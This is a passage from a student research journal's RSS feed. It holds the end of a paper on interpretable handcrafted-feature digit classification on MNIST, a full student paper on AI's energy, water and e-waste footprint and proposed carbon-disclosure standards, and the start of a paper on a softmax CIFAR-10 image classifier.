<p>Second, while some features such as pixel count and symmetry are stable across digits, others—particularly corner and intersection counts—are sensitive to noise and variations in stroke width. Even after applying skeletonization and refinement techniques, some digits still exhibit spurious feature detections in areas of high stroke density. These inaccuracies can mislead the classifier, especially for digits like “5” and “9” that have subtle structural differences (Siddiqi &amp; Pizer, 2008).</p>



<p>Another challenge arises from the uniform scaling of feature distances. Since all features are normalized to the same scale before Euclidean distance is calculated, differences in feature stability and importance can be overlooked unless explicitly corrected with proper weighting. Without optimized weights, the classifier may be biased toward features that have larger variance or noise, reducing accuracy.</p>



<h2 class="wp-block-heading">Implications for Future Work</h2>



<p>The findings from this system reinforce the idea that simple, interpretable features can still perform competitively on classification tasks when properly designed and tuned. This supports the value of feature engineering in settings where model explainability is critical. Additionally, the ability to visualize the contribution of each feature creates opportunities for human-in-the-loop optimization and error analysis.</p>



<p>These results also open the door to future hybrid approaches. By combining the transparent logic of engineered features with the pattern recognition strength of machine learning models, it may be possible to create hybrid systems that provide both high accuracy and clear explanations. In educational settings, this system can serve as a baseline for teaching students the fundamentals of computer vision and classification without the overhead of deep learning frameworks (Nguyen &amp; Bai, 2020).</p>



<p>Finally, the architecture’s modularity makes it well-suited for experimentation with novel features. Techniques like stroke order estimation, writing speed simulation, or temporal reconstruction of digit drawing paths may offer further improvements. The flexibility and transparency of the current system provide a solid foundation for continued exploration.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>This research project presents an interpretable, feature-based approach to handwritten digit classification using the MNIST dataset. Unlike black-box deep learning models, the method relies on clearly defined, explainable features such as pixel count, symmetry, corner and intersection detection, writing direction via Fourier and gradient analysis, and geometric properties like bounding boxes and centers of mass. Through careful engineering and visualization of these features, the system offers valuable insight into how digits can be uniquely characterized by their visual structure (Nguyen &amp; Bai, 2020).</p>



<p>The classifier itself uses a weighted Euclidean distance algorithm to compare new digit samples to statistical averages derived from a training set. This approach allows the model to make data-driven predictions while maintaining transparency and flexibility. Results were visualized via confusion matrices, highlighting both successful classifications and areas where the model struggled, such as differentiating between visually similar digits like 4 and 9. Weight adjustments to the features significantly improved accuracy by emphasizing the most discriminative properties.</p>



<p>One of the key contributions of this work lies in the balance between accuracy and interpretability. While modern deep learning approaches may achieve higher performance metrics, they often sacrifice explainability. This project demonstrates that through methodical feature selection and modular design, it is possible to achieve strong classification performance without abandoning transparency (Nguyen &amp; Bai, 2020).</p>



<p>Looking forward, this framework serves as a robust foundation for further research into human-interpretable machine learning systems. By continuing to refine feature definitions, integrating hybrid techniques, and addressing edge cases through new innovations like stroke order simulation, the model can evolve to rival more complex approaches—while remaining understandable and trustworthy.</p>



<p>In conclusion, this project highlights the potential of interpretable, modular AI systems to achieve meaningful results in computer vision tasks, with wide-ranging applications in education, transparency-focused AI development, and real-world deployment where explainability is paramount.</p>



<h2 class="wp-block-heading">References</h2>



<p>Fan, Y., Zhao, X., Wang, L., Wang, W., Wang, S., &amp; Xu, M. (2021). A review on interpretability of artificial neural networks. <em>Frontiers in Neurorobotics, 15</em>, 752666. <a href="https://doi.org/10.3389/fnbot.2021.752666">https://doi.org/10.3389/fnbot.2021.752666</a></p>



<p>Lipton, Z. C. (2018). <em>The mythos of model interpretability: In machine learning, the concept of interpretability is both important and slippery</em>. Communications of the ACM, 61(10), 36–43. https://doi.org/10.1145/3233231</p>



<p>Lundberg, S. M., &amp; Lee, S.-I. (2017). A Unified Approach to Interpreting Model Predictions. Advances in Neural Information Processing Systems, 30. https://proceedings.neurips.cc/paper_files/paper/2017/hash/8a20a8621978632d76c43dfd28b67767-Abstract.html (Lundberg &amp; Lee, 2017).</p>



<p>Nguyen, T. T., &amp; Bai, L. (2020). A review of traditional and deep learning-based feature descriptors for image classification. Journal of Big Data, 7(1), 1–32. https://link.springer.com/article/10.1186/s40537-020-00327-4 (Nguyen &amp; Bai, 2020).</p>



<p>Siddiqi, K., &amp; Pizer, S. M. (2008). Medial Representations: Mathematics, Algorithms and Applications. Springer. https://link.springer.com/book/10.1007/978-1-4020-8658-3 (Siddiqi &amp; Pizer, 2008).</p>



<p>Xie, S., &amp; Tu, Z. (2015). Holistically-Nested Edge Detection. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (pp. 1395–1403). https://openaccess.thecvf.com/content_cvpr_2015/html/Xie_Holistically-Nested_Edge_Detection_2015_CVPR_paper.html (Xie &amp; Tu, 2015).</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Austin Benedicto
</h5><p>Austin is a 12th grade student at the Nichols School in Buffalo, New York. He enjoys studying computer science and robotics in school. Austin has been involved in the FIRST Robotic program at his school for the last 8 years, serving both as a team member and mentoring younger students. He also served as project manager on the coding sub team and has an interest in artificial intelligence.


</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance/">Interpretable Digit Classification using Handcrafted Features and Euclidean Distance</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Uncover The Hidden Environmental Cost of AI</title>
		<link>https://exploratiojournal.com/uncover-the-hidden-environmental-cost-of-ai/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=uncover-the-hidden-environmental-cost-of-ai</link>
		
		<dc:creator><![CDATA[Stavros Farsedakis]]></dc:creator>
		<pubDate>Sun, 12 Oct 2025 20:01:25 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4383</guid>

					<description><![CDATA[<p>Stavros Farsedakis<br />
Pine Crest School</p>
<p>The post <a href="https://exploratiojournal.com/uncover-the-hidden-environmental-cost-of-ai/">Uncover The Hidden Environmental Cost of AI</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Stavros Farsedakis<br><strong>Mentor</strong>: Dr. Hong Pan<br><em>Pine Crest School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>Everyone&#8217;s talking about Al, but no one&#8217;s talking about its hidden cost. We think of Al as this invisible &#8220;cloud,&#8221; but it&#8217;s built on a massive network of data centers guzzling energy, water, and hardware. The stats are wild: a single data center can use as much electricity as a whole city, and training one AI model can burn through enough energy to power over 100 homes for a year. On top of that, these places use billions of gallons of water for cooling, a serious problem in a world dealing with droughts. The tech gets old super fast, creating a mountain of e-waste five times faster than we can recycle it.</p>



<p>This paper exposes the shady side of Al, where companies hide their environmental impact behind outdated metrics and a total lack of transparency. But it&#8217;s not all bad news. We&#8217;re also exploring how we can fix this mess with cool tech like &#8220;Green Al,&#8221; new policies, and a shift to renewable energy. It&#8217;s time to make Al not just smart but sustainable.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1716" height="984" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.48.31-PM.webp" alt="" class="wp-image-4384"/></figure>



<h2 class="wp-block-heading">Introduction </h2>



<p>Artificial intelligence has become a powerful technology in our world, but its true environmental cost is often never shown. While we interact with AI through the concept of cloud computing, this technology is built on a physical network of large data centers that use massive amounts of resources. As AI models have grown, a significant problem has emerged: developers are not required to disclose the energy or carbon footprint of their systems. This lack of transparency makes it difficult for anyone to understand the full environmental impact. To address this gap, this paper proposes a simple &#8220;nutrition label&#8221; for AI models, which is called the Model Carbon-Disclosure Standard (MCDS). This label would show key metrics like the energy consumed and carbon generated, making the environmental cost clear and comparable. </p>



<p>The idea of a disclosure framework is not new. The Greenhouse Gas (GHG) Protocol gives a global way to measure emissions, and groups like the Carbon Disclosure Project (CDP) encourage companies and governments to share their environmental impacts with investors and the public. As the market demands more of this transparency, it becomes increasingly important for a company&#8217;s financial and competitive standing. </p>



<p>The environmental footprint of computing has a history that has evolved over time. In the early days, concerns were mostly focused on the toxic byproducts from manufacturing devices. With the growth of large data and cloud computing, attention turned to the heavy energy and water consumption of data centers, real buildings that the term “cloud” often hides. Globally, the number of data centers has exploded in just the past decade. (“Measuring AI’s Energy/Environmental Footprint to Access Impacts, ” 2025) </p>



<p>The emergence of AI has dramatically accelerated these trends. AI tasks are far more energy-intensive than traditional computing. Training large AI models, for instance, requires a tremendous amount of energy, and even a single question to a chatbot like ChatGPT can use far more electricity than a normal Google search. Since this energy demand is so intense and unpredictable, AI is considered an environmental risk whose full impact is difficult to measure. This paper will explore these challenges in detail and outline a path toward a more transparent and sustainable future for AI. </p>



<h2 class="wp-block-heading">Current Status </h2>



<p>Artificial intelligence, often thought of as an invisible &#8220;cloud, &#8221; is, in reality, built upon a very real and physical foundation of massive data centers. As AI technology becomes more advanced and common in our daily lives, its environmental footprint, in the form of energy, water, and waste, is growing at a rapid pace, creating significant new challenges. </p>



<h4 class="wp-block-heading">The Energy Appetite of AI and Data Centers </h4>



<p>The energy consumption of these data centers, which had been fairly steady for many years, has recently surged because of the boom in AI. In 2023, data centers used about 4.4% of all electricity in the United States, a number that is projected to double or even triple by 2028, reaching up to 12% of the nation&#8217;s total electricity demand. (Increase in Electricity Demand from Data Centers, 2024) To put that into perspective, by 2030, a large data center could use as much electricity as an entire city, and globally, data center electricity use is expected to more than double by the end of the decade. This unexpected and fast growth is putting pressure on power grids, and sometimes utilities keep old, polluting coal plants running longer to meet the demand. </p>



<p>AI tasks use far more energy than traditional computing. Training a large AI model like GPT-3, for instance, consumed enough energy to power about 120 average U.S. homes for a full year. This process also generated a carbon footprint equal to the yearly emissions of 123 gasoline-powered cars. For more common uses, a single question to a chatbot like ChatGPT can use nearly 10 times the electricity of a normal Google search. When you get into more complex tasks, the energy use skyrockets. Creating a five-second AI video, for example, can use about as much electricity as keeping a TV on all day. </p>



<p>Despite these impacts, the industry&#8217;s environmental footprint is very opaque due to a lack of clear and consistent reporting. For example, companies often use outdated metrics like Power Usage Effectiveness (PUE) that only measure a facility&#8217;s efficiency and not how efficiently the actual computer hardware is working. This means a data center can seem efficient on paper while still being very wasteful. A major issue is how companies report their emissions under the Greenhouse Gas (GHG) Protocol, a global framework for measuring emissions, which are categorized into Scope 1 (direct), Scope 2 (from purchased electricity), and Scope 3 (from the value chain, like manufacturing). The purchase of renewable energy credits can hide a company’s real emissions and make them seem much greener than it is. One analysis of a major company&#8217;s 2022 data found that while its publicly reported emissions were only 273 metric tons of carbon, its actual emissions from the local power grid were over 3.8 million metric tons, a difference of more than 19,000 times. This gap in reporting creates a situation where companies are not encouraged to focus on energy efficiency because there are no clear standards to hold them accountable. </p>



<p>One powerful solution to this challenge is a proactive approach to energy sourcing. The Massachusetts Green High Performance Computing Center in Holyoke is an excellent example. This data center is primarily powered by a nearby hydroelectric station, which creates a direct and reliable source of clean energy from the very beginning, rather than relying on a power grid that is heavily dependent on fossil fuels. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1716" height="1250" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.51.24-PM.webp" alt="" class="wp-image-4385"/><figcaption class="wp-element-caption">Figure 1: Projected Growth in Data Center Electricity Use from AI (2022-2030). This chart is a powerful wake-up call, visually showing how AI&#8217;s rapid expansion is creating a massive and growing demand for electricity. As you can see, data centers are set to more than double their electricity consumption by the end of the decade, putting a huge strain on our global power grids. The lines climbing steeply, especially for the U.S. and China, reveal that these countries alone are projected to account for nearly 80% of this growth, a trend that&#8217;s already forcing utilities to keep older, polluting power plants running longer to keep up with demand. This isn&#8217;t just a distant problem; it&#8217;s a real and immediate one that&#8217;s making it harder to transition to clean energy. This image shows us that AI&#8217;s convenience comes with a significant and often hidden environmental cost. (Chen, 2025) </figcaption></figure>



<h4 class="wp-block-heading">AI&#8217;s Thirst for Water </h4>



<p>AI&#8217;s energy demands also create a huge need for water. The powerful computer chips in data centers generate enormous heat, and water is used for cooling to prevent them from breaking down. A single large data center can consume up to 5 million gallons of water every day, which is enough to supply a town of 10,000 to 50,000 people. To show this on a larger scale, Google’s global data centers consumed about 4.3 billion gallons of water in one year, enough to give every person in the United States about 13 gallons. This consumption becomes especially serious in water-stressed regions. In Texas, where the state has been dealing with a severe drought, data centers are projected to use nearly 400 billion gallons of water by 2030, which represents almost 6.6% of the state’s total water usage. While residents are asked to cut back, these new facilities use millions of gallons daily with little public notice. (Texas Data Centers Use 50 Billion Gallons of Water, 2025) As one water policy analyst noted, there is often no requirement for data centers to talk to communities about their water use, which hides much of their environmental impact. </p>



<p>Some innovators are tackling this problem head-on. In Finland, a country with a cold climate, a data center has been designed to operate without traditional mechanical cooling systems. Instead, it uses a system that relies on cold outdoor air or even seawater from the Baltic Sea to cool its servers, which dramatically reduces its energy and water footprint. Even more impressively, the waste heat from the servers is captured and sent to a local district heating network to warm nearby homes and businesses. This creates a win-win situation where the data center not only reduces its own impact but also helps the community use less fossil fuels for heating. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1742" height="860" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.52.46-PM.webp" alt="" class="wp-image-4386"/><figcaption class="wp-element-caption">Figure 2: AI Data Centers and Water Use &#8211; Scope 1 and Scope 2. This diagram cleverly reveals the hidden thirst of AI by showing how data centers use water in two critical ways. The Scope 1 path shows direct water use, where water is pumped into a cooling tower to chill the servers that are running intense AI tasks like ChatGPT. The Scope 2 path, however, shows the often overlooked indirect water use, where water is consumed by the power plants generating the electricity that powers the data center. The immense heat from AI&#8217;s powerful chips makes this cooling essential, and a single large data center can consume millions of gallons of water daily, enough to supply a small city. This is a major environmental issue, especially in places like Texas, which are already struggling with severe droughts. This image makes it clear that we can&#8217;t just talk about AI&#8217;s energy footprint; we also have to address its massive and unsustainable demand for water. (How Much Water Does AI Consume?, 2023)</figcaption></figure>



<p></p>



<h4 class="wp-block-heading">The E-waste Challenge </h4>



<p>The rapid pace of AI innovation has created a competition for faster, more powerful computer hardware. This constant cycle of upgrades and replacements is creating a global electronic waste (e-waste) problem. The manufacturing of this hardware also has its own carbon emissions, which are part of a company&#8217;s Scope 3 emissions under the GHG Protocol. </p>



<p>According to the U.N., global e-waste reached a record 62 million metric tons in 2022, equal to the weight of more than 150 Empire State Buildings. This problem is getting worse, as e-waste is growing nearly five times faster than recycling efforts can keep up. The total amount of e-waste is projected to grow to 82 million tons by 2030. (ewastemonitor, 2024) In a high-usage scenario, the spread of large language models alone is expected to generate an extra 2.5 million tons of e-waste annually by 2030. This waste is especially dangerous because it contains harmful materials like lead and mercury that can damage both human health and the environment if not properly handled. </p>



<p>Adding to the problem is a significant lack of transparency. Only about a quarter of data center operators track what happens to their retired hardware, and even fewer measure the e-waste they generate. This data gap means that tons of valuable and hazardous equipment often end up in landfills, and there is little accountability or incentive for companies to improve their practices. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1618" height="1398" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.54.01-PM.webp" alt="" class="wp-image-4387"/><figcaption class="wp-element-caption">Figure 3: The Global E-waste Monitor. This chart is a clear visual representation of a global crisis: our planet is drowning in electronic waste. The dark grey bars show the staggering amount of e-waste generated per person in different regions, while the light green bars reveal the alarmingly small amount of that waste that is actually collected and recycled. This growing gap shows that e-waste is piling up almost five times faster than we can deal with it. AI is a major driver of this problem because it demands a constant cycle of hardware upgrades, creating a &#8220;mountain of e-waste&#8221; that is filled with toxic materials like lead and mercury. The lack of transparency in the industry, where few companies track their retired hardware, means much of this hazardous equipment ends up in landfills. This figure powerfully illustrates that AI&#8217;s rapid innovation cycle is not just a technological challenge but an urgent environmental one. (Global E-Waste Monitor 2024, 2024) </figcaption></figure>



<h2 class="wp-block-heading">Discussion </h2>



<p>While the environmental challenges of AI are significant, a new movement is underway to build a more sustainable future for this technology. This effort involves a combination of smarter technology, better operational strategies, and new rules to guide the industry. </p>



<h4 class="wp-block-heading">Innovations in &#8220;Green AI&#8221; </h4>



<p>The movement toward &#8220;Green AI&#8221; starts with making the technology itself more efficient. A key part of this is model optimization, where techniques like pruning (removing unnecessary parts of a model) and knowledge distillation (transferring learning from a large model to a smaller one) dramatically reduce the energy needed for AI workloads. For example, researchers have developed tools that can predict a model’s accuracy early in its training, which can save up to 80% of the computing power that would have otherwise been used on a less effective model. </p>



<p>Developers are also creating new, energy-efficient hardware. Beyond traditional GPUs, new types of chips, such as neuromorphic and optical processors, are being designed to run AI tasks with far less power. Additionally, a method called &#8220;power capping&#8221; can be used to limit the electricity sent to processors, which can cut energy use by about 20% with no loss in performance. </p>



<p>Smarter operational strategies are also key. This includes scheduling large computing tasks to run at night when energy demand on the grid is low, or distributing workloads across different time zones to use power when renewable energy like wind and solar is most available. It also means using simpler AI models when they are sufficient for a task, such as a model that runs locally on a user’s device instead of one in a massive data center. (AI Has High Data Center Energy Costs — but There Are Solutions, 2025) </p>



<h4 class="wp-block-heading">The Role of Renewable Energy and Advanced Cooling </h4>



<p>To power the vast data centers that form the backbone of AI, a global shift to clean energy is crucial. Experts predict that by 2030, about half of the electricity used by data centers will come from renewable sources. (Energy Supply for AI, 2025) AI itself can even assist in this transition by forecasting how much renewable energy will be produced at any given time, allowing for better energy management. </p>



<p>Cooling is a great part of a data center&#8217;s energy and water consumption, so new solutions are arising here as well. Advanced cooling systems like liquid cooling are thousands of times more efficient at removing heat than air, allowing for more powerful hardware in a smaller space while using less energy. Another smart strategy is placing data centers in naturally cold climates, like in Finland, to use outside air or cold seawater for &#8220;free cooling&#8221; . </p>



<h4 class="wp-block-heading">Policy and Standardization Efforts</h4>



<p> For these solutions to have a global impact, they must be backed by clear rules and standards. Over 190 countries have agreed on guidelines for ethical AI, including its environmental aspects. Both the European Union and the United States have introduced legislation aimed at managing AI’s environmental footprint. A U.S. Executive Order, for instance, directs the Department of Energy to create reporting requirements for data centers that cover a technology’s full lifecycle, from manufacturing to disposal. </p>



<p>These efforts aim to create new, transparent metrics for the industry. The &#8220;AI Energy Score&#8221; is one idea, which is a simple, star-based rating system to show how energy-efficient an AI model is for a specific task. The International Organization for Standardization (ISO) is also preparing new standards for &#8220;sustainable AI&#8221; that will cover energy, water, and materials. The goal of these policies is to require developers and companies to measure and publicly share their environmental impacts and to integrate these metrics into existing sustainability reports like the Greenhouse Gas (GHG) Protocol. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1904" height="1058" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.56.47-PM.webp" alt="" class="wp-image-4388"/><figcaption class="wp-element-caption">Figure 4: GHG Protocol Scopes and Emissions Across the Value Chain. This diagram is a crucial tool for understanding the full environmental impact of a company, including those in the AI sector. It breaks down greenhouse gas emissions into three key categories: Scope 1 (direct emissions from a company’s own vehicles and facilities), Scope 2 (indirect emissions from the electricity they purchase), and Scope 3 (all other indirect emissions across their supply chain). This framework is critical because it forces companies to look beyond just their direct operations to the entire lifecycle of their technology, including the emissions from manufacturing the hardware and disposing of it as e-waste. This chart highlights the importance of transparency, showing why it&#8217;s so easy for companies to hide their true carbon footprint by only focusing on a small part of their total emissions, creating a situation where they seem greener than they really are. (GHG Protocol Scopes and Emissions Across the Value Chain, 2024) </figcaption></figure>



<h2 class="wp-block-heading">Conclusion </h2>



<p>The rapid growth of AI is driving a significant surge in demand for energy, water, and hardware; however, our ability to measure and manage this impact is often hindered by a lack of transparency. The industry has frequently used outdated metrics or misleading reporting, which makes it hard to hold companies accountable for their actual environmental footprint. This has created a situation where companies are not strongly motivated to make their models more energy-efficient because there are no clear standards to do so. AI affects many areas, including energy use, water supplies, and e-waste, and these impacts grow as AI models run constantly and get upgraded quickly. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1622" height="1386" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.57.38-PM.webp" alt="" class="wp-image-4389"/><figcaption class="wp-element-caption">Figure 5: The Integrated Pathway to a Sustainable AI Future. This final diagram provides a hopeful roadmap for the future. It shows that creating a sustainable AI industry is not something that a single group can achieve alone. Instead, it requires a collaborative effort where Individuals (as users and citizens), Technology (developers and companies), and Government (policymakers) work together. The arrows show how these three groups must influence each other: new technology can create a need for new legislation, while government policies and standards can guide the development of technology in a more sustainable direction. This is the solution to the problems of energy, water, and e-waste, demonstrating that a future where AI is both powerful and sustainable is possible through a combined approach of smarter technology and clear, effective policy. It reminds us that our collective actions, from our behaviors to our political requests, can drive meaningful change for the environment. (Vinuesa et al., 2020) </figcaption></figure>



<p>The path forward requires an integrated approach that combines new technology with clear policy. We can make AI more sustainable by using smarter model designs, more efficient hardware, and innovative cooling methods. At the same time, policies that require companies to provide clear and honest information about AI&#8217;s environmental impact are essential to create balanced conditions and hold companies accountable. This combined effort is vital to ensure that the AI revolution is not only powerful and transformative but also sustainable for our planet and future generations. </p>



<h2 class="wp-block-heading">References </h2>



<p>AI has high data center energy costs—But there are solutions. (2025, January 7). https://mitsloan.mit.edu/ideas-made-to-matter/ai-has-high-data-center-energy-costs-ther e-are-solutions </p>



<p>Chen, S. (2025). Data centres will use twice as much energy by 2030. Nature. https://doi.org/10.1038/d41586-025-01113-z </p>



<p>Electronic Waste Rising Five Times Faster than Documented E-waste Recycling. (2024). https://unitar.org/about/news-stories/press/global-e-waste-monitor-2024-electronic-waste -rising-five-times-faster-documented-e-waste-recycling </p>



<p>Energy supply for AI. (2025). IEA. https://www.iea.org/reports/energy-and-ai/energy-supply-for-ai ewastemonitor. (2024, March 20). The Global E-waste Monitor. E-Waste Monitor. https://ewastemonitor.info/the-global-e-waste-monitor-2024/ </p>



<p>GHG Protocol Scopes and Emissions Across the Value Chain. (2024, February 6). Jeff Winter. https://www.jeffwinterinsights.com/insights/scope-emissions-overview </p>



<p>Greenhouse Gas Protocol. (2025). https://ghgprotocol.org/ </p>



<p>How much water does AI consume? (2023, November 30). https://oecd.ai/en/wonk/how-much-water-does-ai-consume </p>



<p>Increase in Electricity Demand from Data Centers. (2024, December 20). Energy.Gov. https://www.energy.gov/articles/doe-releases-new-report-evaluating-increase-electricity-d emand-data-centers </p>



<p>Measuring AI’s Energy/Environmental Footprint to Access Impacts. (2025). Federation of American Scientists. https://fas.org/publication/measuring-and-standardizing-ais-energy-footprint/ </p>



<p>Texas data centers use 50 billion gallons of water. (2025). Newsweek. https://www.newsweek.com/texas-data-center-water-artificial-intelligence-2107500 </p>



<p>The Importance of FLOPS. (2025). https://www.lenovo.com/us/en/glossary/flops/ </p>



<p>Vinuesa, R., Azizpour, H., Leite, I., Balaam, M., Dignum, V., Domisch, S., Felländer, A., Langhans, S. D., Tegmark, M., &amp; Fuso Nerini, F. (2020). The role of artificial intelligence in achieving the Sustainable Development Goals. Nature Communications, 11(1), 233. https://doi.org/10.1038/s41467-019-14108-y </p>



<p>What is Power Usage Effectiveness? (2025). https://www.www.digitalrealty.com/resources/articles/what-is-power-usage-effectiveness ?t=1755978324820?latest</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Stavros Farsedakis</h5><p>Stavros&#8217; academic interests center on computer science and artificial intelligence, especially exploring how technology impacts the environment. Outside the classroom, he enjoys coding projects and researching ways to make AI more sustainable and efficient.

</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/uncover-the-hidden-environmental-cost-of-ai/">Uncover The Hidden Environmental Cost of AI</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>A Journey into Image Classification: Developing and implementing a custom image classifier</title>
		<link>https://exploratiojournal.com/a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier</link>
		
		<dc:creator><![CDATA[Sarikonda Grishmanth Reddy]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 17:13:09 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4095</guid>

					<description><![CDATA[<p>Sarikonda Grishmanth Reddy<br />
DRS International School</p>
<p>The post <a href="https://exploratiojournal.com/a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier/">A Journey into Image Classification: Developing and implementing a custom image classifier</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Sarikonda&nbsp;Grishmanth Reddy<br><strong>Mentor</strong>: Dr. Eric Fouh<br><em>DRS International School</em></p>
</div></div>



<p><br>This paper explores the implementation of a softmax classifier for image classification tasks using the CIFAR-10 dataset. The methodology involves using TensorFlow to develop a simple classification pipeline that learns to categorize images into ten classes. Key findings show that the classifier achieved a training accuracy of 43% and a test accuracy of 26.5%, indicating the limitations of the softmax model for complex visual tasks. Despite performance limitations, the project highlights fundamental processes in image classification and suggests pathways for further research using more advanced architectures.</p>



<p><br>Image classification, a core application of neural networks, provides independent visual data categorization, making it crucial for a wide range of applications . It converts photos into actionable information, improving decision-making and the effectiveness of healthcare, security, and autonomous systems. This paper details my experience developing and applying a softmax classifier to an image classification task. Here, I highlight the main takeaways and difficulties that emerged while considering areas that may benefit from improvement. In addition to shedding light on the subtler parts of algorithm creation in computer vision, this work should present readers with practical aspects of developing and refining models for image classification through hands-on experiences and technical considerations. &nbsp;</p>



<h2 class="wp-block-heading"><strong>1. Motivation</strong></h2>



<p>The purpose of image recognition, a branch of computer vision, is for presenting robots a way to categorize and comprehend visual data. It&#8217;s largely tied to deep learning methods that successfully imitate particular features of human vision [2]. Image recognition mostly involves sophisticated mathematical models to classify and segment pictures, integrating visual data into organized information [3]. Applications where visual data analysis is essential, like automated healthcare diagnostics, autonomous vehicle navigation, and pattern recognition in security systems, make the transformation in question crucial. Using machine learning methods for image identification, highly precise classifications are found that form the basis of artificial intelligence for identifying hierarchical spatial relationships and relational patterns in pictures [4, 5]. &nbsp;</p>



<p>Across many scientific and industrial fields, image recognition is vital. In healthcare, image recognition analyzes MRI, CT, and X-ray imagery to assist with diagnosing diseases [1]. These systems use neural networks that were earlier taught to identify anatomical features and spot anomalies, which helps radiologists and other medical professionals identify and diagnose diseases early [6]. Biometric identification in security systems relies heavily on picture recognition, particularly in technology for facial recognition, where computers examine facial features to confirm an individual&#8217;s identity [5]. In real-time recognition of images, it is essential for autonomous cars because it can identify and categorize road objects including lanes, obstructions, and pedestrians to direct the vehicle&#8217;s reaction [5]. Such uses of image recognition allow for safer and more effective solutions in a variety of companies while also advancing technical capabilities [1]. &nbsp;</p>



<h4 class="wp-block-heading">1.1 <strong>Deep Learning Advancements in Image Recognition</strong></h4>



<p><br>Deep learning algorithms, particularly convolutional neural networks (CNNs), have been the main driver of image recognition advancements [7]. CNNs are made up of layers of convolution that apply filters to images, enabling neural networks to detect low-level characteristics like edges and textures before moving on to more complex patterns and objects [7]. One prevalent variation of CNN is called region-based CNN (RCNN), and it seems to have made object identification much more efficient in that it first distinguishes areas of interest before using its CNNs to identify objects within those regions [8]. Other notable strengths include its adaptability to handle various object detection and segmentation tasks, such as in security surveillance and medical imaging [8]. Another significant model is the You Only Look Once (YOLO) architecture, which is ideal for real-time applications because object detection only makes one pass through the entire image grid [9]. &nbsp;</p>



<h4 class="wp-block-heading">1.2 <strong>Vision Transformers and Emerging Techniques</strong></h4>



<p><br>Vision transformers (ViTs) are a recent development in image recognition [1]. Originally intended for natural language processing, transformers employ self-attention processes to discover interactions in visual data [1]. By removing the spatial constraints imposed by CNNs, this technique allows the model to &#8220;look at&#8221; significant areas of an image and enables a method that outperforms CNNs and others in collecting global context inside photographs [1]. While training on huge datasets, it can perform similarly to CNN or even better in some cases [1]. &nbsp;</p>



<h4 class="wp-block-heading"><strong>1.3 Challenges and Ethical Considerations</strong></h4>



